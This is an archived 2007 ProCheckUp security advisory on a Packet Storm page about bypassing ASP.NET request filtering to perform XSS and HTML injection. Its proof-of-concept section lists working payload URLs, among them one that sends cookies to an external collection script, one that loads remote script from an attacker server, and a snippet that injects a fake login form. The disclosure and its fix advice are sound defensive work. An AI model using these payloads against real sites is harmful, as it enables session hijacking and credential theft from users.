exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dotnet-bypass.txt

dotnet-bypass.txt
Posted Apr 7, 2007
Authored by Adrian Pastor, Richard Brain, Jan Fry | Site procheckup.com

By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET request filtering and perform cross site scripting and HTML injection attacks.

tags | exploit, xss, asp, bypass
SHA-256 | 4b78fe2bdca6f7c490f51b3622de9ef13cf64b7899eaa6f8f39a70a7ab3ae074

dotnet-bypass.txt

Change Mirror Download
FYI,

The following are the technical details for the Microsoft .NET request filtering bypass vulnerability (BID 20753):


ProCheckUp Security Bulletin

This advisory has been published following consultation with UK CPNI (formally known as NISCC)

Title: Microsoft ASP.NET request filtering can be bypassed allowing XSS and HTML injection attacks


CERT: None


Date found: 7 July, 2006

The following client/server environment was tested and found vulnerable:

- Microsoft Windows Server 2003 Standard Edition Build 3790.srv03_sp1_rtm.050324-1447 Service Pack 1
- Microsoft IIS 6.0
- Microsoft ASP .NET Framework Version 2.0.50727.42
- Microsoft Internet Explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
- Microsoft Internet Explorer 7.0.5450.4 Beta 3
- Microsoft Internet Explorer 7.0.5730.11


Severity: Medium


Credits: request filtering bypass found by Richard Brain and further researched by Jan Fry and Adrian Pastor


Vendor Status: N/A


CVE Candidate: Not assigned


Description:

By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET request filtering and perform XSS and HTML injection attacks.

It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application setup in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customer's live environments.


Notes:

In order to exploit this flaw, an attacker would need to target a .NET server-side application which does not sanitize input parameters properly before being returned back to the web browser.


Proof of concept:

In the following examples 'vuln-search.aspx' is a script that solely relies on ASP .NET request filtering, and returns user-supplied input back to the browser.

Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

Redirection Attack
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com")>

Cookie stealing
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/cookiemonster.php?sid="%2bdocument.cookie)>

Unrestricted HTML injection from external '.js' file
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild(document.createElement("script")))></XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))>

where 'xss.js' could contain a snippet that overwrites the entire document's HTML body. i.e.:

document.body.innerHTML = '<b>since we can now insert brakets without having to escape the request filtering, we\'re free to insert any HTML tags</b></br><form name="myform" action="http://www.procheckup.com"><input type="text" name="login"><br/><input type="password" name="password"></br><input type="submit" value="Login"></form>';myform.login.focus();


Consequences:

Attackers can hijack user accounts through XSS and HTML injection attacks against vulnerable applications that solely rely on ASP .NET request filtering.


Fix:

Do not rely on ASP .NET filtering protection, sanitize all input parameters on server side applications. Follow a whitelisting approach when performing input filtering.


References:

http://www.procheckup.com/Vulner_PR0703.php
http://www.securityfocus.com/bid/20753/
http://www.cpni.gov.uk/docs/re-20061020-00710.pdf
http://www.owasp.org/index.php/Category:OWASP_.NET_Project


Legal:

Copyright 2007 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close